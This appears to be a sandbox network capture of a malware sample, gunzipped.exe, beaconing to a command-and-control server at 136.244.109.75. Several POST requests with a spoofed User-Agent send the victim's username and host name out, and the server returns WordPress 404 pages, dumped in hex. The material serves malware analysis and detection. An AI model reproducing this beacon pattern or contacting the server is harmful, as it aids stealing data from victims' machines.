                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:46.936645985 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:46.936661959 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:46.936671972 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:46.936692953 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:46.936711073 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:46.936729908 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:46.936749935 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:46.936769009 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:46.936789989 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          36192.168.2.549749136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:47.288202047 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:47.496434927 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:48.413928986 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:47 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:48.413994074 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:48.414031982 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:48.414069891 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:48.414107084 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:48.414146900 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:48.414185047 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:48.414222956 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:48.414273977 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:48.414314032 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          37192.168.2.549750136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:48.803719044 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:49.012465000 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:49.947792053 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:48 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 